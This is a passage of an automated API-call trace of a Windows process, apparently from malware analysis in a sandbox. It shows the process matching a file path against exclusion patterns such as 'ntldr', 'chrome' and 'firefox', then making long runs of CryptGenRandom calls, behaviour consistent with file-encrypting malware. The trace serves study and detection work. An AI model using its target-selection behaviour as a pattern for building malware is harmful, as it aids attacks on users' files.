[0165.084] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*ntldr*") returned 0 [0165.084] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*chrome*") returned 0 [0165.084] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*opera*") returned 0 [0165.084] PathMatchSpecW (pszFile="Roses.jpg", pszSpec="*firefox*") returned 0 [0165.084] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg", pszSpec="*") returned 1 [0165.084] strlen (_Str="NMoreira") returned 0x8 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.085] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.086] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.087] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.088] CryptGenRandom 